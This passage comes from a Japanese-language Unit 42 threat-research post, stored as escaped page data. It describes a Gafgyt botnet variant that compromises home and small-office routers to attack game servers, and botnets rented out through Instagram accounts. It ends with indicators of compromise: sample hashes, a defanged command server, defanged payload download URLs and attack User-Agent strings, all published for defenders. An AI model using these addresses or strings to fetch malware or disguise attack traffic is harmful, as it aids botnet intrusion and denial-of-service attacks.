lot.<\/em><\/span><\/p>\n<p>\u3068\u3044\u3046\u6587\u5b57\u5217\u3092\u51fa\u529b\u3059\u308b\u306e\u3067\u3059\u3002<\/p>\n<p>\u3053\u308c\u3089\u6587\u5b57\u5217\u306e\u591a\u304f\u306f\u3001Hakai\u3001Miori\u3001Satori\u3001\u60aa\u540d\u9ad8\u3044Mirai\u306a\u3069\u3001\u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u95a2\u9023\u3057\u305f\u3082\u306e\u3067\u3057\u305f\u3002\u3053\u306e\u307b\u304b\u306b\u306f\u3001Instagram\u3067\u306e\u30e6\u30fc\u30b6\u30fc\u540d\u306b\u5bfe\u5fdc\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30d3\u30eb\u30c9\u306b\u95a2\u9023\u3059\u308b\u6587\u5b57\u5217\u3082\u898b\u3089\u308c\u307e\u3057\u305f\u3002<\/p>\n<p>\u8abf\u67fb\u30c1\u30fc\u30e0\u304c\u507d\u306e\u30d7\u30ed\u30d5\u30a3\u30fc\u30eb\u3067\u4f5c\u3063\u305f\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u3053\u308c\u3089Instagram\u30e6\u30fc\u30b6\u30fc\u306b\u9023\u7d61\u3057\u305f\u7d50\u679c\u3001\u5f7c\u3089\u304cInstagram\u306e\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u4f7f\u3063\u3066\u5b89\u4fa1\u306b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u5f7c\u3089\u306f\u79c1\u305f\u3061\u306b\u300c8\u30c9\u30eb\u304b\u3089150\u30c9\u30eb\u3067\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u300e\u30b9\u30dd\u30c3\u30c8\u300f\u3092\u63d0\u4f9b\u3067\u304d\u308b\u300d\u3068\u3044\u3046\u8a71\u3092\u6301\u3061\u304b\u3051\u3066\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u300c\u30b9\u30dd\u30c3\u30c8\u300d\u3068\u3044\u3046\u306e\u306f\u300c\u5bfe\u4fa1\u3092\u6255\u3048\u3070\u3001\u7a3c\u50cd\u4e2d\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067DoS\u653b\u6483\u3092\u304b\u3051\u308bIP\u30a2\u30c9\u30ec\u30b9\u306e\u5bfe\u8c61\u306b\u3001\u4efb\u610f\u306eIP\u30a2\u30c9\u30ec\u30b9\u306e\u30bb\u30c3\u30c8\u3092\u8ffd\u52a0\u3057\u3066\u3082\u3089\u3048\u308b\u300d\u3068\u3044\u3046\u3053\u3068\u3092\u610f\u5473\u3057\u3066\u3044\u307e\u3059\u3002\u4ed6\u306b\u3082\u5f7c\u3089\u306f\u300c\u4e88\u7b97\u3068\u30cb\u30fc\u30ba\u6b21\u7b2c\u3067\u3001\u3055\u307e\u3056\u307e\u306a\u4fa1\u683c\u3067\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u63d0\u4f9b\u3067\u304d\u308b\u300d\u3068\u3044\u3046\u8a71\u3082\u6301\u3061\u304b\u3051\u3066\u304d\u307e\u3057\u305f\u3002<\/p>\n<p>\u203b Unit 42\u306fInstagram\u30c1\u30fc\u30e0\u306b\u3053\u308c\u3089\u60aa\u610f\u306e\u3042\u308b\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u306b\u3064\u3044\u3066\u5831\u544a\u6e08\u307f\u3067\u3059\u3002\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30b5\u30d6\u30b9\u30af\u30ea\u30d7\u30b7\u30e7\u30f3\u7ba1\u7406\u7528\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u60aa\u610f\u306e\u3042\u308bWeb\u30b5\u30a4\u30c8\u306b\u3064\u3044\u3066\u3082\u5831\u544a\u6e08\u307f\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_100649\" aria-describedby=\"caption-attachment-100649\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100650 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets.png\" alt=\"\u56f311 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3057\u3066\u3044\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8\" width=\"600\" height=\"408\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets.png 705w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets-300x204.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-11.-Instagram-accounts-selling-botnets-370x251.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100649\" class=\"wp-caption-text\">\u56f311 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3057\u3066\u3044\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8<\/figcaption><\/figure>\n<figure id=\"attachment_100651\" aria-describedby=\"caption-attachment-100651\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100652 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png\" alt=\"\u56f312 Fortnite\u3078\u306e\u653b\u6483\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3059\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8\" width=\"600\" height=\"700\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite.png 694w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite-257x300.png 257w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-12.-Instagram-account-selling-botnets-against-Fortnite-370x432.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100651\" class=\"wp-caption-text\">\u56f312 Fortnite\u3078\u306e\u653b\u6483\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u8ca9\u58f2\u3059\u308bInstagram\u30a2\u30ab\u30a6\u30f3\u30c8<\/figcaption><\/figure>\n<figure id=\"attachment_100654\" aria-describedby=\"caption-attachment-100654\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100655 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user.png\" alt=\"\u56f313 \u60aa\u610f\u306e\u3042\u308bInstragram\u30e6\u30fc\u30b6\u30fc\u306e\u30b9\u30c8\u30fc\u30ea\u30fc\" width=\"600\" height=\"1095\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user.png 626w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user-164x300.png 164w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user-561x1024.png 561w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-13.-Instagram-story-of-a-malicious-user-370x675.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100654\" class=\"wp-caption-text\">\u56f313 \u60aa\u610f\u306e\u3042\u308bInstragram\u30e6\u30fc\u30b6\u30fc\u306e\u30b9\u30c8\u30fc\u30ea\u30fc<\/figcaption><\/figure>\n<p>\u4e00\u90e8\u306e\u30e6\u30fc\u30b6\u30fc\u306f\u3001\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u30b5\u30d6\u30b9\u30af\u30ea\u30d7\u30b7\u30e7\u30f3\u7ba1\u7406\u306e\u305f\u3081\u306b\u72ec\u81ea\u306eWeb\u30b5\u30a4\u30c8\u3092\u6301\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100656\" aria-describedby=\"caption-attachment-100656\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-1024x354.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100656 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-1024x354.png\" alt=\"\u56f314 \u30a6\u30a7\u30d6\u30b5\u30a4\u30c8\u306e\u30ed\u30b0\u30a4\u30f3\u753b\u9762\" width=\"1024\" height=\"354\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-1024x354.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-300x104.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-768x265.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-900x311.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-14.-Login-to-the-website-370x128.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption id=\"caption-attachment-100656\" class=\"wp-caption-text\">\u56f314 \u30a6\u30a7\u30d6\u30b5\u30a4\u30c8\u306e\u30ed\u30b0\u30a4\u30f3\u753b\u9762<\/figcaption><\/figure>\n<figure id=\"attachment_100658\" aria-describedby=\"caption-attachment-100658\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-1024x733.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100658 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-1024x733.png\" alt=\"\u56f315 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u8cfc\u5165\u7528\u306e\u30c0\u30c3\u30b7\u30e5\u30dc\u30fc\u30c9\" width=\"1024\" height=\"733\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-1024x733.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-300x215.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-768x550.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-900x644.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-15.-Dashboard-to-hire-botnets-370x265.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption id=\"caption-attachment-100658\" class=\"wp-caption-text\">\u56f315 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u8cfc\u5165\u7528\u306e\u30c0\u30c3\u30b7\u30e5\u30dc\u30fc\u30c9<\/figcaption><\/figure>\n<figure id=\"attachment_100664\" aria-describedby=\"caption-attachment-100664\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100664 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png\" alt=\"\u56f316 VIP\u30b9\u30dd\u30c3\u30c8\u3068\u547c\u3070\u308c\u308b\u4e00\u756a\u9ad8\u3044\u4fa1\u683c\" width=\"1024\" height=\"301\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-1024x301.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-300x88.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-768x226.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-900x264.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1-370x109.png 370w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-16.-Highest-prices-called-VIP-spots-1.png 1518w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption id=\"caption-attachment-100664\" class=\"wp-caption-text\">\u56f316 VIP\u30b9\u30dd\u30c3\u30c8\u3068\u547c\u3070\u308c\u308b\u4e00\u756a\u9ad8\u4fa1\u306a\u30b5\u30fc\u30d3\u30b9<\/figcaption><\/figure>\n<h2>\u7d50\u8ad6<\/h2>\n<p>\u79c1\u305f\u3061\u8abf\u67fb\u30c1\u30fc\u30e0\u304c\u767a\u898b\u3057\u305f\u65b0\u305f\u306a\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067\u3042\u308bGafgyt\u306f\u3001JenX\u306e\u4e9c\u7a2e\u304b\u3089\u6d3e\u751f\u3057\u305f\u3082\u306e\u3067\u3001IoT\u30c7\u30d0\u30a4\u30b9\u306e\u65e2\u77e5\u306e\u8106\u5f31\u6027\uff085\u5e74\u4ee5\u4e0a\u524d\u306e\u3082\u306e\u3092\u542b\u3080\uff09\u3092\u7a81\u304f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u4f7f\u3044\u3001\u4fb5\u5bb3\u3057\u305fIoT\u30c7\u30d0\u30a4\u30b9\u3092\u5927\u898f\u6a21\u306a\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u4e00\u90e8\u306b\u7d44\u307f\u8fbc\u3093\u3067\u3001\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u72d9\u3063\u305f\u653b\u6483\u3092\u884c\u3044\u307e\u3059\u3002\u305d\u306e\u653b\u6483\u306e\u4e3b\u306a\u76ee\u7684\u306f\u30b5\u30dc\u30bf\u30fc\u30b8\u30e5\u3084\u5fa9\u8b90\u3067\u3059\u3002<\/p>\n<p>\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306f\u3069\u306e\u696d\u7a2e\u3067\u3082\u5e83\u304f\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u3053\u3046\u3057\u305f\u653b\u6483\u306b\u3068\u304f\u306b\u72d9\u308f\u308c\u3084\u3059\u3044\u3082\u306e\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u304a\u5ba2\u69d8\u306e\u74b0\u5883\u3092\u4fdd\u8b77\u3059\u308b\u305f\u3081\u3001\u5f0a\u793e\u3067\u3082\u3053\u3046\u3057\u305f\u65b0\u3057\u3044\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u63a2\u7d22\u3092\u5e38\u306b\u884c\u3063\u3066\u3044\u307e\u3059\u3002IoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304c\u653b\u6483\u5bfe\u8c61\u3068\u3059\u308b\u30db\u30b9\u30c8\u306e\u7a2e\u985e\u306f\u3053\u308c\u307e\u3067\u3068\u6bd4\u3079\u3066\u5e83\u304c\u3063\u3066\u304a\u308a\u3001\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3082\u305d\u3046\u3057\u305f\u653b\u6483\u306e\u6a19\u7684\u306b\u306a\u308a\u3084\u3059\u3044\u30db\u30b9\u30c8\u306e1\u3064\u3067\u3059\u3002<\/p>\n<p>\u540c\u69d8\u306b\u3001\u3053\u308c\u307e\u3067\u30de\u30eb\u30a6\u30a7\u30a2\u7528\u30de\u30fc\u30b1\u30c3\u30c8\u30d7\u30ec\u30a4\u30b9\u3068\u3044\u3048\u3070\u30c0\u30fc\u30af\u30a6\u30a7\u30d6\u3084\u5730\u4e0b\u30d5\u30a9\u30fc\u30e9\u30e0\u306e\u3088\u3046\u306a\u30a2\u30f3\u30c0\u30fc\u30b0\u30e9\u30a6\u30f3\u30c9\u7cfb\u306e\u3082\u306e\u304c\u591a\u304b\u3063\u305f\u306e\u3067\u3059\u304c\u3001\u73fe\u5728\u306fSNS\u4e0a\u3067\u306e\u8ca9\u58f2\u304c\u884c\u308f\u308c\u308b\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30b5\u30f3\u30d7\u30eb\u3084DoS\u653b\u6483\u7528\u306e\u30b3\u30fc\u30c9\u306f\u8ab0\u3082\u304c\u7c21\u5358\u306b\u5165\u624b\u3067\u304d\u3001\u305f\u3044\u3057\u305f\u6280\u8853\u529b\u304c\u306a\u304f\u3068\u3082\u6570\u30c9\u30eb\u3067\u5927\u898f\u6a21\u306a\u653b\u6483\u3092\u4ed5\u639b\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u8981\u3059\u308b\u306b\u3001Instagram\u3067\u8ca9\u58f2\u3055\u308c\u3066\u3044\u308bIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u5897\u52a0\u3001\u30b3\u30b9\u30c8\u306e\u4f4e\u4e0b\u3001RCE\uff08\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff09\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u5b58\u5728\u3001\u3059\u3079\u3066\u306e\u696d\u7a2e\u3067\u666e\u904d\u7684\u306b\u5229\u7528\u3055\u308c\u3066\u3044\u308b\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u3001\u3053\u308c\u3089\u306e\u8981\u7d20\u304c\u3059\u3079\u3066\u5408\u308f\u3055\u3063\u3066\u3001IoT\u30c7\u30d0\u30a4\u30b9\u304c\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u8fbc\u307e\u308c\u308b\u30ea\u30b9\u30af\u306f\u3044\u3088\u3044\u3088\u9ad8\u307e\u3063\u3066\u304d\u3066\u3044\u308b\u3068\u3044\u3046\u3053\u3068\u3067\u3059\u3002<\/p>\n<p>\u3053\u308c\u3089\u8af8\u8981\u7d20\u306f\u3001\u3059\u3079\u3066\u306e\u696d\u754c\u304cIoT\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u610f\u8b58\u3057\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30c7\u30d0\u30a4\u30b9\u3078\u306e\u4fb5\u5bb3\u3092\u9632\u304e\u3001\u30d3\u30b8\u30cd\u30b9\u306e\u7d99\u7d9a\u6027\u3092\u4fdd\u3064\u5bfe\u7b56\u3092\u8b1b\u3058\u308b\u5fc5\u8981\u6027\u3092\u6d6e\u304d\u5f6b\u308a\u306b\u3057\u3066\u3044\u308b\u3068\u8a00\u3048\u308b\u3067\u3057\u3087\u3046\u3002<\/p>\n<h2>IOC<\/h2>\n<h4><strong>\u524d\u8eab\u3068\u306a\u3063\u305fJenX\u306e\u30b5\u30f3\u30d7\u30eb:<\/strong><\/h4>\n<ul>\n<li><strong>MD5: <\/strong><span style=\"font-family: 'courier new', courier, monospace;\">fb93601f8d4e0228276edff1c6fe635d<\/span><\/li>\n<li><strong>SHA256: <\/strong><span style=\"font-family: 'courier new', courier, monospace;\">04463cd1a961f7cd1b77fe6c9e9f5e18b34633f303949a0bb07282dedcd8e9dc<\/span><\/li>\n<\/ul>\n<h4><strong>\u66f4\u65b0\u3055\u308c\u305fJenX\u306e\u30b5\u30f3\u30d7\u30eb:<\/strong><\/h4>\n<ul>\n<li><strong>MD5:<\/strong> <span style=\"font-family: 'courier new', courier, monospace;\">f1c099d65bf94e009f5e65238caac468<\/span><\/li>\n<li><strong>SHA256:<\/strong> <span style=\"font-family: 'courier new', courier, monospace;\">676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07<\/span><\/li>\n<\/ul>\n<h4><strong>\u30a4\u30f3\u30d5\u30e9:<\/strong><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">185.172.110[.]224:993<\/span><\/li>\n<\/ul>\n<h4><strong>URL:<\/strong><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">185.172.110[.]224\/arm7<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">185.172.110[.]224\/mips<\/span><\/li>\n<\/ul>\n<h4><strong>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067HTTP\u653b\u6483\u306b\u4f7f\u308f\u308c\u3066\u3044\u305fUser-Agent:<\/strong><\/h4>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko\/20100101 Firefox\/13.0.1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/536.5 (KHTML, like Gecko)<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">Chrome\/19.0.1084.56 Safari\/536.5<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/536.11 (KHTML, like Gecko)<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">Chrome\/20.0.1132.47 Safari\/536.11<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit\/534.57.2 (KHTML,<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">like Gecko) Version\/5.1.7 Safari\/534.57.2<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Windows NT 5.1; rv:13.0) Gecko\/20100101 Firefox\/13.0.1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit\/536.11 (KHTML,<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">like Gecko) Chrome\/20.0.1132.47 Safari\/536.11<\/span><\/li>\n<\/ul>\n<p>\u4e0a\u8a18User-Agent\u306b\u52a0\u3048\u3001Gafgyt\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306e\u4e9c\u7a2e\u306f\u30b9\u30ad\u30e3\u30ca\u30e2\u30b8\u30e5\u30fc\u30eb\u5185\u3067<span style=\"font-family: 'courier new', courier, monospace;\"><em>User-Agent: Hello-World<\/em><\/span>\u3068<span style=\"font-family: 'courier new', courier, monospace;\"><em>User-Agent: Ankit<\/em><\/span>\u3092\u4f7f\u3063\u3066\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u9001\u4fe1\u3057\u307e\u3059\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Unit 42 researchers discovered an updated Gafgy variant that looks to infect home and small office WiFi routers of known commercial brands, like Zyxel, Huawei, and Realtek to attack gaming servers.  More than 32,000 WiFi routers are potentially vulnerable to these exploits around the world. <\/p>\n","protected":false},"author":328,"featured_media":134326,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4469,4434,4428,4470],"tags":[4689,5769,6031,4679,6536],"product_categories":[4346,4442,4443,4444,4448,4456],"coauthors":[1487],"class_list":["post-100731","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerabilities","category-cybercrime-ja","category-threat-research-ja","category-vulnerabilities-ja","tag-botnet-ja","tag-ddos-ja","tag-exploit-kit-ja","tag-iot-ja","tag-wifi-routers","product_categories-advanced-threat-prevention","product_categories-advanced-threat-prevention-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire-ja","product_categories-cortex-xdr-ja","product_categories-next-generation-firewall-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8<\/title>\n<meta name=\"description\" content=\"Unit 42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\" \/>\n<meta property=\"og:description\" content=\"Unit 